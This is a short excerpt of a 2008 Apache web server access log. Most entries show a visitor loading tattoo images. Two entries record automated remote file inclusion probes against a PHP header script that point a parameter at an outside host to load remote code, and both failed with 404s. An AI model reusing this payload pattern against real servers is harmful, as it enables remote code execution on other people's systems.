71.100.40.240 - - [12/Jun/2008:15:44:59 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
211.233.58.184 - - [12/Jun/2008:15:44:59 -0500] "GET /logs/access_log.1204156800//Neos_Chronos/header.php?base_folder=http://ninguem.t35.com/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
71.100.40.240 - - [12/Jun/2008:15:44:59 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:45:00 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:45:00 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:45:00 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:45:00 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
211.233.58.184 - - [12/Jun/2008:15:45:00 -0500] "GET //Neos_Chronos/header.php?base_folder=http://ninguem.t35.com/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
71.100.40.240 - - [12/Jun/2008:15:45:00 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
71.100.40.240 - - [12/Jun/2008:15:45:01 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
